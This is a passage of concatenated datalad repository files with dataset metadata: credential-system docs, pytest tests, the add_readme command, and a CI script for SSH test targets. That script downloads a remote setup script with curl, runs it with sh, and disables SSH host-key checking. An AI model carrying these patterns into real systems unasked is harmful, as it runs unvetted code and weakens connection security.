:mod:`~datalad.support.keyring_`.\n This provides support for credential storage on all major platforms, but also extensibility, providing 3rd-parties to implement and use specialized solutions.\n\nWhen a credential is required for operation, but could not be obtained via any of the above approaches, DataLad can prompt for credentials in interactive terminal sessions.\nInteractively entered credentials will be stored in the active credential store available via the ``keyring`` package.\nNote, however, that the keyring approach is somewhat abused by datalad.\nThe wrapper only uses ``get_/set_password`` of ``keyring`` with the credential's ``FIELDS`` as the name to query (essentially turning the keyring into a plain key-value store) and \"datalad-<CREDENTIAL-LABEL>\" as the \"service name\".\nWith this approach it's not possible to use credentials in a system's keyring that were defined by other, datalad unaware software (or users).\n\nWhen a credential value is known but invalid, the invalid value must be removed or replaced in the active credential store.\nBy setting the configuration flag ``datalad.credentials.force-ask``, DataLad can be instructed to force interactive credential re-entry to effectively override any store credential with a new value.\n\nProviders\n=========\n\nProviders are associating credentials with a context for using them and are defined by configuration files.\nA single provider is represented by :class:`Provider` object and the list of available providers is represented by the :class:`Providers` class.\nA provider is identified by a label and stored in a dedicated config file per provider named `LABEL.cfg`.\nSuch a file can reside in a dataset (under `.datalad/providers/`), at the user level (under `{user_config_dir}/providers`), at the system level (under `{site_config_dir}/providers`) or come packaged with the datalad distribution (in directory `configs` next to `providers.py`).\nSuch a provider specifies a regular expression to match URLs against and assigns authenticator abd credentials to be used for a match.\nCredentials are referenced by their label, which in turn is the name of another section in such a file specifying the type of the credential.\nReferences to credential and authenticator types are strings that are mapped to classes by the following dict definitions:\n\n- ``datalad.downloaders.AUTHENTICATION_TYPES``\n- ``datalad.downloaders.CREDENTIAL_TYPES``\n\nAvailable providers can be loaded by ``Providers.from_config_files`` and ``Providers.get_provider(url)`` will match a given URL against them and return the appropriate `Provider` instance.\nA :class:`Provider` object will determine a downloader to use (derived from :class:`BaseDownloader`), based on the URL's protocol.\n\nNote, that the provider config files are not currently following datalad's general config approach.\nInstead they are special config files, read by :class:`configparser.ConfigParser` that are not compatible with `git-config` and hence the :class:`ConfigManager`.\n\nThere are currently two ways of storing a provider and thus creating its config file: ``Providers.enter_new`` and ``Providers._store_new``.\nThe former will only work interactively and provide the user with options to choose from, while the latter is non-interactive and can therefore only be used, when all properties of the provider config are known and passed to it.\nThere's no way at the moment to store an existing :class:`Provider` object directly.\n\nIntegration with Git\n====================\n\nIn addition, there's a special case for interfacing `git-credential`: A dedicated :class:`GitCredential` class is used to talk to Git's ``git-credential`` command instead of the keyring wrapper.\nThis class has identical fields to the :class:`UserPassword` class and thus can be used by the same authenticators.\nSince Git's way to deal with credentials doesn't involve labels but only matching URLs, it is - in some sense - the equivalent of datalad's provider layer.\nHowever, providers don't talk to a backend, credentials do.\nHence, a more seamless integration requires some changes in the design of datalad's credential system as a whole.\n\nIn the opposite direction - making Git aware of datalad's credentials, there's no special casing, though.\nDataLad comes with a `git-credential-datalad` executable.\nWhenever Git is configured to use it by setting `credential.helper=datalad`, it will be able to query datalad's credential system for a provider matching the URL in question and retrieve the referenced by this provider credentials.\nThis helper can also store a new provider+credentials when asked to do so by Git.\nIt can do this interactively, asking a user to confirm/change that config or - if `credential.helper='datalad --non-interactive'` - try to non-interactively store with its defaults.\n\nAuthenticators\n==============\n\nAuthenticators are used by downloaders to issue authenticated requests.\nThey are not easily available to directly be applied to requests being made outside of the downloaders.\n" }, { "alpha_fraction": 0.6970587968826294, "alphanum_fraction": 0.699999988079071, "avg_line_length": 27.33333396911621, "blob_id": "ef7c356029a70311b67c4313a4af0d1cb633039c", "content_id": "28f519e5eb97317ff70850a56e0ae79667151821", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "permissive", "max_line_length": 72, "num_lines": 12, "path": "/datalad/runner/tests/utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nimport sys\n\n\ndef py2cmd(code: str, *additional_arguments: str) -> list[str]:\n \"\"\"Helper to invoke some Python code through a cmdline invocation of\n the Python interpreter.\n\n This should be more portable in some cases.\n \"\"\"\n return [sys.executable, '-c', code] + list(additional_arguments)\n" }, { "alpha_fraction": 0.6593511700630188, "alphanum_fraction": 0.6860687136650085, "avg_line_length": 18.054546356201172, "blob_id": "87fc6433bb07deca84c41357036e442def660a3f", "content_id": "97469b1e51138b96cf70c87dee364d47fb39c108", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1048, "license_type": "permissive", "max_line_length": 86, "num_lines": 55, "path": "/tools/ci/prep-travis-forssh.sh", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/bash\nset -eu\n\nmkdir -p \"$HOME/.ssh\"\n\nif command -V docker-machine &> /dev/null\nthen docker_host=\"$(docker-machine inspect --format='{{.Driver.IPAddress}}' default)\"\nelse docker_host=localhost\nfi\n\ncat >>\"$HOME/.ssh/config\" <<EOF\n\nHost datalad-test\nHostName $docker_host\nPort 42241\nUser dl\nStrictHostKeyChecking no\nIdentityFile /tmp/dl-test-ssh-id\nEOF\n\ncat >>\"$HOME/.ssh/config\" <<EOF\n\nHost datalad-test2\nHostName $docker_host\nPort 42242\nUser dl\nStrictHostKeyChecking no\nIdentityFile /tmp/dl-test-ssh-id\nEOF\n\nls -l \"$HOME/.ssh\"\nchmod go-rwx -R \"$HOME/.ssh\"\nls -ld \"$HOME/.ssh\"\nls -l \"$HOME/.ssh\"\n\nssh-keygen -f /tmp/dl-test-ssh-id -N \"\"\n\ncurl -fSsL \\\n https://raw.githubusercontent.com/datalad-tester/docker-ssh-target/master/setup \\\n >setup-docker-ssh\nsh setup-docker-ssh --key=/tmp/dl-test-ssh-id.pub -2\n\ntries=60\nn=0\nwhile true\ndo nc -vz \"$docker_host\" 42241 && nc -vz \"$docker_host\" 42242 && break\n ((n++))\n if [ \"$n\" -lt \"$tries\" ]\n then sleep 1\n else exit 1\n fi\ndone\n\nssh -v datalad-test exit\nssh -v datalad-test2 exit\n" }, { "alpha_fraction": 0.6568488478660583, "alphanum_fraction": 0.6593328714370728, "avg_line_length": 31.022727966308594, "blob_id": "415007e0972680ec64ae2501144a110fcc78842d", "content_id": "2bede344f03a1558baac5d8870fee1f8ad72af88", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2818, "license_type": "permissive", "max_line_length": 112, "num_lines": 88, "path": "/datalad/customremotes/tests/test_base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for the base of our custom remotes\"\"\"\n\n\nfrom os.path import isabs\n\nimport pytest\n\nfrom datalad.api import (\n Dataset,\n clone,\n)\nfrom datalad.consts import DATALAD_SPECIAL_REMOTE\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_in,\n assert_not_in,\n assert_raises,\n known_failure_githubci_win,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import Path\n\nfrom ..archives import ArchiveAnnexCustomRemote\nfrom ..base import (\n ensure_datalad_remote,\n init_datalad_remote,\n)\n\n\n# PermissionError: [WinError 32] The process cannot access the file because it is being used by another process:\n@known_failure_githubci_win\n@with_tree(tree={'file.dat': ''})\ndef test_get_contentlocation(tdir=None):\n repo = AnnexRepo(tdir, create=True, init=True)\n repo.add('file.dat')\n repo.commit('added file.dat')\n\n # TODO contentlocation would come with eval_availability=True\n key = repo.get_file_annexinfo('file.dat')['key']\n cr = ArchiveAnnexCustomRemote(None, path=tdir)\n key_path = cr.get_contentlocation(key, absolute=False)\n assert not isabs(key_path)\n key_path_abs = cr.get_contentlocation(key, absolute=True)\n assert isabs(key_path_abs)\n assert cr._contentlocations == {key: key_path}\n repo.drop('file.dat', options=['--force'])\n assert not cr.get_contentlocation(key, absolute=True)\n\n\ndef test_ensure_datalad_remote_unkown_remote():\n with assert_raises(ValueError):\n ensure_datalad_remote(\"doesn't matter\", \"unknown\")\n\n\n@with_tempfile\ndef test_ensure_datalad_remote_init_and_enable_needed(path=None):\n from datalad.consts import DATALAD_SPECIAL_REMOTE\n ds = Dataset(path).create(force=True)\n repo = ds.repo\n assert_false(repo.get_remotes())\n ensure_datalad_remote(repo)\n assert_in(DATALAD_SPECIAL_REMOTE, repo.get_remotes())\n\n\[email protected](\"autoenable\", [False, True])\n@with_tempfile\ndef test_ensure_datalad_remote_maybe_enable(path=None, *, autoenable):\n path = Path(path)\n ds_a = Dataset(path / \"a\").create(force=True)\n init_datalad_remote(ds_a.repo, DATALAD_SPECIAL_REMOTE,\n autoenable=autoenable)\n\n ds_b = clone(source=ds_a.path, path=path / \"b\")\n repo = ds_b.repo\n if not autoenable:\n assert_not_in(\"datalad\", repo.get_remotes())\n ensure_datalad_remote(repo)\n assert_in(\"datalad\", repo.get_remotes())\n" }, { "alpha_fraction": 0.63456791639328, "alphanum_fraction": 0.6422839760780334, "avg_line_length": 25.776859283447266, "blob_id": "ba3ba6607a617c88a1e3a263c2de2a7cb42227c1", "content_id": "2948f65259fb621dcfe55c4f9aa74e7e025234db", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3240, "license_type": "permissive", "max_line_length": 80, "num_lines": 121, "path": "/datalad/runner/tests/test_threadsafety.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nimport random\nimport threading\nimport time\nfrom threading import Thread\n\nfrom datalad.tests.utils_pytest import assert_raises\n\nfrom ..coreprotocols import StdOutCapture\nfrom ..nonasyncrunner import ThreadedRunner\nfrom ..protocol import (\n GeneratorMixIn,\n WitlessProtocol,\n)\nfrom .utils import py2cmd\n\n\nclass MinimalGeneratorProtocol(GeneratorMixIn, StdOutCapture):\n def __init__(self) -> None:\n StdOutCapture.__init__(self)\n GeneratorMixIn.__init__(self)\n\n\nclass MinimalStdOutGeneratorProtocol(GeneratorMixIn, StdOutCapture):\n def __init__(self) -> None:\n StdOutCapture.__init__(self)\n GeneratorMixIn.__init__(self)\n\n def pipe_data_received(self, fd: int, data: bytes) -> None:\n for line in data.decode().splitlines():\n self.send_result((fd, line))\n\n\ndef _runner_with_protocol(protocol: type[WitlessProtocol]) -> ThreadedRunner:\n return ThreadedRunner(\n cmd=py2cmd(\"for i in range(5): print(i)\"),\n protocol_class=protocol,\n stdin=None)\n\n\ndef _run_on(runner: ThreadedRunner,\n iterate: bool,\n exceptions: list[type[BaseException]]\n ):\n try:\n gen = runner.run()\n if iterate:\n for _ in gen:\n time.sleep(random.random())\n except Exception as e:\n exceptions.append(e.__class__)\n\n\ndef _get_run_on_threads(protocol: type[WitlessProtocol],\n iterate: bool\n ) -> tuple[Thread, Thread, list]:\n\n runner = _runner_with_protocol(protocol)\n\n args: tuple[ThreadedRunner, bool, list] = (runner, iterate, [])\n thread_1 = threading.Thread(target=_run_on, args=args)\n thread_2 = threading.Thread(target=_run_on, args=args)\n\n return thread_1, thread_2, args[2]\n\n\ndef _reentry_detection_run(protocol: type[WitlessProtocol],\n iterate: bool\n ) -> list:\n\n thread_1, thread_2, exception = _get_run_on_threads(protocol, iterate)\n\n thread_1.start()\n thread_2.start()\n\n thread_1.join()\n thread_2.join()\n return exception\n\n\ndef test_thread_serialization() -> None:\n # expect that two run calls on the same runner with a non-generator-protocol\n # do not create a runtime error (executions are serialized though)\n\n exceptions = _reentry_detection_run(StdOutCapture, True)\n assert exceptions == []\n\n\ndef test_reentry_detection() -> None:\n runner = _runner_with_protocol(MinimalGeneratorProtocol)\n runner.run()\n assert_raises(RuntimeError, runner.run)\n\n\ndef test_leave_handling() -> None:\n runner = _runner_with_protocol(MinimalStdOutGeneratorProtocol)\n all_results = [\n \"\".join(e[1] for e in runner.run())\n for _ in (0, 1)\n ]\n\n assert all_results[0] == all_results[1]\n\n\ndef test_thread_leave_handling() -> None:\n # expect no exception on repeated call to run of a runner with\n # generator-protocol, if the generator was exhausted before the second call\n\n thread_1, thread_2, exception = _get_run_on_threads(\n MinimalStdOutGeneratorProtocol,\n True\n )\n\n thread_1.start()\n thread_1.join()\n\n thread_2.start()\n thread_2.join()\n\n assert exception == []\n" }, { "alpha_fraction": 0.5974589586257935, "alphanum_fraction": 0.598078727722168, "avg_line_length": 35.258426666259766, "blob_id": "08f574ca968a8a883dd6fabe240a2f01ff6f986a", "content_id": "949bf87b8ee50bdc708d245772bc220e6976e9f9", "detected_licenses": [ "BSD-3-Clause", "MIT", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9681, "license_type": "permissive", "max_line_length": 126, "num_lines": 267, "path": "/datalad/local/add_readme.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"add a README file to a dataset\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\n\nfrom datalad.interface.base import Interface\nfrom datalad.interface.base import build_doc\nfrom datalad.support.annexrepo import AnnexRepo\n\nlgr = logging.getLogger('datalad.local.add_readme')\n\n\n@build_doc\nclass AddReadme(Interface):\n \"\"\"Add basic information about DataLad datasets to a README file\n\n The README file is added to the dataset and the addition is saved\n in the dataset.\n Note: Make sure that no unsaved modifications to your dataset's\n .gitattributes file exist.\n\n \"\"\"\n from datalad.support.param import Parameter\n from datalad.distribution.dataset import datasetmethod\n from datalad.interface.base import eval_results\n from datalad.distribution.dataset import EnsureDataset\n from datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n )\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"Dataset to add information to. If no dataset is given, an\n attempt is made to identify the dataset based on the current\n working directory.\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n filename=Parameter(\n args=(\"filename\",),\n metavar=\"PATH\",\n nargs='?',\n doc=\"\"\"Path of the README file within the dataset.\"\"\",\n constraints=EnsureStr()),\n existing=Parameter(\n args=(\"--existing\",),\n doc=\"\"\"How to react if a file with the target name already exists:\n 'skip': do nothing; 'append': append information to the existing\n file; 'replace': replace the existing file with new content.\"\"\",\n constraints=EnsureChoice(\"skip\", \"append\", \"replace\")),\n )\n\n @staticmethod\n @datasetmethod(name='add_readme')\n @eval_results\n def __call__(filename='README.md',\n *,\n dataset=None,\n existing='skip'):\n from os.path import lexists\n from os.path import join as opj\n from io import open\n\n from datalad.distribution.dataset import require_dataset\n from datalad.utils import ensure_list\n\n dataset = require_dataset(dataset, check_installed=True,\n purpose='add README')\n\n fpath = opj(dataset.path, filename)\n res_kwargs = dict(action='add_readme', path=fpath)\n\n if lexists(fpath) and existing == 'skip':\n yield dict(\n res_kwargs,\n status='notneeded',\n message='file already exists, and not appending content')\n return\n\n # unlock, file could be annexed\n if lexists(fpath):\n yield from dataset.unlock(\n fpath,\n return_type='generator',\n result_renderer='disabled'\n )\n if not lexists(fpath):\n # if we have an annex repo, shall the README go to Git or annex?\n\n if isinstance(dataset.repo, AnnexRepo) \\\n and 'annex.largefiles' not in \\\n dataset.repo.get_gitattributes(filename).get(filename, {}):\n # configure the README to go into Git\n dataset.repo.set_gitattributes(\n [(filename, {'annex.largefiles': 'nothing'})])\n yield from dataset.save(\n path='.gitattributes',\n message=\"[DATALAD] Configure README to be in Git\",\n to_git=True,\n return_type='generator',\n result_renderer='disabled'\n )\n\n # get any metadata on the dataset itself\n meta = _get_dataset_metadata(dataset)\n metainfo = ''\n for label, content in (\n ('', meta.get('description', meta.get('shortdescription', ''))),\n ('Author{}'.format('s' if isinstance(meta.get('author', None), list) else ''),\n u'\\n'.join([u'- {}'.format(a) for a in ensure_list(meta.get('author', []))])),\n ('Homepage', meta.get('homepage', '')),\n ('Reference', meta.get('citation', '')),\n ('License', meta.get('license', '')),\n ('Keywords', u', '.join([u'`{}`'.format(k) for k in ensure_list(meta.get('tag', []))])),\n ('Funding', meta.get('fundedby', '')),\n ):\n if label and content:\n metainfo += u'\\n\\n### {}\\n\\n{}'.format(label, content)\n elif content:\n metainfo += u'\\n\\n{}'.format(content)\n\n for key in 'title', 'name', 'shortdescription':\n if 'title' in meta:\n break\n if key in meta:\n meta['title'] = meta[key]\n\n default_content=u\"\"\"\\\n# {title}{metainfo}\n\n## General information\n\nThis is a DataLad dataset{id}.\n\n## DataLad datasets and how to use them\n\nThis repository is a [DataLad](https://www.datalad.org/) dataset. It provides\nfine-grained data access down to the level of individual files, and allows for\ntracking future updates. In order to use this repository for data retrieval,\n[DataLad](https://www.datalad.org/) is required. It is a free and open source\ncommand line tool, available for all major operating systems, and builds up on\nGit and [git-annex](https://git-annex.branchable.com/) to allow sharing,\nsynchronizing, and version controlling collections of large files.\n\nMore information on how to install DataLad and [how to install](http://handbook.datalad.org/en/latest/intro/installation.html)\nit can be found in the [DataLad Handbook](https://handbook.datalad.org/en/latest/index.html).\n\n### Get the dataset\n\nA DataLad dataset can be `cloned` by running\n\n```\ndatalad clone <url>\n```\n\nOnce a dataset is cloned, it is a light-weight directory on your local machine.\nAt this point, it contains only small metadata and information on the identity\nof the files in the dataset, but not actual *content* of the (sometimes large)\ndata files.\n\n### Retrieve dataset content\n\nAfter cloning a dataset, you can retrieve file contents by running\n\n```\ndatalad get <path/to/directory/or/file>\n```\n\nThis command will trigger a download of the files, directories, or subdatasets\nyou have specified.\n\nDataLad datasets can contain other datasets, so called *subdatasets*. If you\nclone the top-level dataset, subdatasets do not yet contain metadata and\ninformation on the identity of files, but appear to be empty directories. In\norder to retrieve file availability metadata in subdatasets, run\n\n```\ndatalad get -n <path/to/subdataset>\n```\n\nAfterwards, you can browse the retrieved metadata to find out about subdataset\ncontents, and retrieve individual files with `datalad get`. If you use\n`datalad get <path/to/subdataset>`, all contents of the subdataset will be\ndownloaded at once.\n\n### Stay up-to-date\n\nDataLad datasets can be updated. The command `datalad update` will *fetch*\nupdates and store them on a different branch (by default\n`remotes/origin/master`). Running\n\n```\ndatalad update --merge\n```\n\nwill *pull* available updates and integrate them in one go.\n\n### Find out what has been done\n\nDataLad datasets contain their history in the ``git log``. By running ``git\nlog`` (or a tool that displays Git history) in the dataset or on specific\nfiles, you can find out what has been done to the dataset or to individual\nfiles by whom, and when.\n\"\"\".format(\n title='Dataset \"{}\"'.format(meta['title']) if 'title' in meta else 'About this dataset',\n metainfo=metainfo,\n id=u' (id: {})'.format(dataset.id) if dataset.id else '',\n )\n\n with open(fpath, 'a' if existing == 'append' else 'w', encoding='utf-8') as fp:\n fp.write(default_content)\n yield dict(\n status='ok',\n path=fpath,\n type='file',\n action='add_readme')\n\n yield from dataset.save(\n fpath,\n message='[DATALAD] added README',\n result_filter=None,\n result_xfm=None,\n return_type='generator',\n result_renderer='disabled'\n )\n\n\ndef _get_dataset_metadata(dataset):\n \"\"\"Implement this function to perform metadata reporting for a dataset\n\n This implementation reports no metadata.\n\n Returns\n -------\n dict\n Can contain keys like 'description', 'shortdescription', 'author',\n 'homepage', 'citation', 'license', 'tag', 'fundedby'\n \"\"\"\n\n meta = {}\n if hasattr(dataset, 'metadata'):\n dsinfo = dataset.metadata(\n '.',\n reporton='datasets',\n return_type='item-or-list',\n result_renderer='disabled',\n on_failure='ignore')\n if not isinstance(dsinfo, dict) or dsinfo.get('status', None) != 'ok':\n lgr.warning(\"Could not obtain dataset metadata, proceeding without\")\n else:\n # flatten possibly existing multiple metadata sources\n for src in dsinfo['metadata']:\n if src.startswith('@'):\n # not a source\n continue\n meta.update(dsinfo['metadata'][src])\n return meta\n" }, { "alpha_fraction": 0.6091679930686951, "alphanum_fraction": 0.6118177175521851, "avg_line_length": 40.93333435058594, "blob_id": "1bc54fe59b878be2a3e15b22def8d6c30bbfa526", "content_id": "0d8bf9eed6e3bf7686edcdc0bcecacdb6cd359f0", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3774, "license_type": "permissive", "max_line_length": 90, "num_lines": 90, "path": "/datalad/interface/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface definition\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n# ORDER MATTERS FOLKS!\n\n# the following should be series of import definitions for interface implementations\n# that shall be exposed in the Python API and the cmdline interface\n# all interfaces should be associated with (at least) one of the groups below\n# the name of the `_group_*` variable determines the sorting in the command overview\n# alphanum ascending order\n_group_0dataset = (\n 'Essential',\n [\n # source module, source object[, dest. cmdline name[, dest python name]]\n # src module can be relative, but has to be relative to the main 'datalad' package\n ('datalad.core.local.create', 'Create'),\n ('datalad.core.local.save', 'Save', 'save'),\n ('datalad.core.local.status', 'Status', 'status'),\n ('datalad.core.distributed.clone', 'Clone'),\n ('datalad.distribution.get', 'Get'),\n ('datalad.core.distributed.push', 'Push', 'push'),\n ('datalad.core.local.run', 'Run', 'run'),\n ('datalad.core.local.diff', 'Diff', 'diff'),\n ])\n\n_group_1siblings = (\n 'Collaborative workflows',\n [\n ('datalad.distributed.create_sibling_github', 'CreateSiblingGithub'),\n ('datalad.distributed.create_sibling_gitlab', 'CreateSiblingGitlab'),\n ('datalad.distributed.create_sibling_gogs', 'CreateSiblingGogs'),\n ('datalad.distributed.create_sibling_gin', 'CreateSiblingGin'),\n ('datalad.distributed.create_sibling_gitea', 'CreateSiblingGitea'),\n ('datalad.distributed.create_sibling_ria', 'CreateSiblingRia'),\n ('datalad.distribution.create_sibling', 'CreateSibling'),\n ('datalad.distribution.siblings', 'Siblings', 'siblings'),\n ('datalad.distribution.update', 'Update'),\n ])\n\n_group_2dataset = (\n 'Dataset operations',\n [\n ('datalad.local.subdatasets', 'Subdatasets'),\n ('datalad.distributed.drop', 'Drop'),\n ('datalad.local.remove', 'Remove'),\n ('datalad.local.addurls', 'Addurls'),\n ('datalad.local.copy_file', 'CopyFile'),\n ('datalad.local.download_url', 'DownloadURL'),\n ('datalad.local.foreach_dataset', 'ForEachDataset', 'foreach-dataset'),\n ('datalad.distribution.install', 'Install'),\n ('datalad.local.rerun', 'Rerun'),\n ('datalad.local.run_procedure', 'RunProcedure'),\n ])\n\n_group_3misc = (\n 'Miscellaneous',\n [\n ('datalad.local.configuration', 'Configuration'),\n ('datalad.local.wtf', 'WTF'),\n ('datalad.local.clean', 'Clean'),\n ('datalad.local.add_archive_content', 'AddArchiveContent'),\n ('datalad.local.add_readme', 'AddReadme'),\n ('datalad.local.export_archive', 'ExportArchive'),\n ('datalad.distributed.export_archive_ora', 'ExportArchiveORA'),\n ('datalad.distributed.export_to_figshare', 'ExportToFigshare'),\n ('datalad.local.no_annex', 'NoAnnex'),\n ('datalad.local.check_dates', 'CheckDates'),\n ('datalad.local.unlock', 'Unlock'),\n ('datalad.distribution.uninstall', 'Uninstall'),\n ])\n\n_group_4plumbing = (\n 'Plumbing',\n [\n ('datalad.distribution.create_test_dataset', 'CreateTestDataset',\n 'create-test-dataset'),\n ('datalad.support.sshrun', 'SSHRun', 'sshrun'),\n ('datalad.interface.shell_completion', 'ShellCompletion', 'shell-completion'),\n ])\n" }, { "alpha_fraction": 0.7380073666572571, "alphanum_fraction": 0.7380073666572571, "avg_line_length": 23.636363983154297, "blob_id": "a5a8e777a20dc524f069a6447941736d031fc767", "content_id": "ee14e680b1015d7a1f2d84074cbdccfa2a1b5204", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 271, "license_type": "permissive", "max_line_length": 64, "num_lines": 11, "path": "/datalad/cli/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"DataLad command line interface\"\"\"\n\n# ATTN!\n# The rest of the code base MUST NOT import from datalad.cli\n# in order to preserve the strict separation of the CLI from the\n# rest.\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nlgr = logging.getLogger('datalad.cli')\n" }, { "alpha_fraction": 0.6226415038108826, "alphanum_fraction": 0.6283839344978333, "avg_line_length": 32.86111068725586, "blob_id": "f70e229b6a4b2bf344766c01bb58afad27b35497", "content_id": "2cfdfb5a463eb060775069401c5e6495d2e3d11f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1219, "license_type": "permissive", "max_line_length": 79, "num_lines": 36, "path": "/datalad/distribution/tests/test_dataset_api.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test Dataset class @datasetmethod bindings without possible side effects\nfrom needed otherwise datalad.api imports.\n\nThis one to be effective should be tested first or in isolation from other\ntest files\n\"\"\"\n\nfrom ...tests.utils_pytest import (\n assert_raises,\n with_tempfile,\n)\nfrom ..dataset import Dataset\n\n\n@with_tempfile(mkdir=True)\ndef test_datasetmethod_bound(path=None):\n ds = Dataset(path)\n # should be automagically imported/picked up if not bound already\n assert ds.create # simplest, intfspec only 2 entries\n assert ds.download_url # 3 entries, with dash\n assert ds.create_sibling_github # 3 entries, 2 dashes\n assert ds.drop # some fancy parametrization\n assert ds.get # some fancy parametrization\n # plugins\n assert ds.addurls\n assert ds.wtf\n # if we ask for some really not known API - kaboom\n with assert_raises(AttributeError):\n ds.kaboommethod()\n" }, { "alpha_fraction": 0.6199575662612915, "alphanum_fraction": 0.6251688599586487, "avg_line_length": 32.21154022216797, "blob_id": "6105b15c9f590cdefe0cd92856be1ee807d7e17d", "content_id": "42f6599d4302780e0ae0dd23349d197e27231ec0", "detected_licenses": [ "LicenseRef-scancode-unknown-license-reference", "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5181, "license_type": "permissive", "max_line_length": 117, "num_lines": 156, "path": "/datalad/local/tests/test_foreach_dataset.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test foreach-dataset command\"\"\"\n\nimport os.path as op\nimport sys\nfrom pathlib import Path\n\nimport pytest\n\nfrom datalad.api import create\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.tests.utils_pytest import (\n assert_false,\n assert_greater,\n assert_in,\n assert_not_in,\n assert_status,\n eq_,\n get_deeply_nested_structure,\n ok_clean_git,\n swallow_outputs,\n with_tempfile,\n)\n\n\ndef _without_command(results):\n \"\"\"A helper to tune up results so that they lack 'command'\n which is guaranteed to differ between different cmd types\n \"\"\"\n out = []\n for r in results:\n r = r.copy()\n r.pop('command')\n out.append(r)\n return out\n\n\n@with_tempfile(mkdir=True)\ndef check_basic_resilience(populator, path=None):\n ds = populator(path)\n ds.save()\n kwargs = dict(recursive=True)\n\n res_external = ds.foreach_dataset(\n [sys.executable, '-c', 'from datalad.distribution.dataset import Dataset; ds=Dataset(\".\"); print(ds.path)'],\n **kwargs)\n res_python = ds.foreach_dataset(\"ds.path\", cmd_type='eval', **kwargs)\n\n # a sample python function to pass to foreach\n def get_path(ds, **kwargs):\n return ds.path\n\n res_python_func = ds.foreach_dataset(get_path, **kwargs)\n\n assert_status('ok', res_external)\n assert_status('ok', res_python)\n\n # consistency checks\n eq_(len(res_external), len(res_python))\n eq_(len(res_external), len(res_python_func))\n eq_(_without_command(res_python), _without_command(res_python_func))\n\n # Test correct order for bottom-up vs top-down\n topdown_dss = [ds.path] + ds.subdatasets(result_xfm='paths', bottomup=False, **kwargs)\n eq_(topdown_dss, [_['result'] for _ in res_python])\n\n bottomup_dss = ds.subdatasets(result_xfm='paths', recursive=True, bottomup=True) + [ds.path]\n eq_(bottomup_dss, [_['result'] for _ in ds.foreach_dataset(\"ds.path\", bottomup=True, cmd_type='eval', **kwargs)])\n\n # more radical example - cleanup\n # Make all datasets dirty\n for d in bottomup_dss:\n (Path(d) / \"dirt\").write_text(\"\")\n res_clean = ds.foreach_dataset(['git', 'clean', '-f'], jobs=10, **kwargs)\n assert_status('ok', res_clean)\n # no dirt should be left\n for d in bottomup_dss:\n assert_false((Path(d) / \"dirt\").exists())\n\n if populator is get_deeply_nested_structure:\n ok_clean_git(ds.path, index_modified=[ds.pathobj / 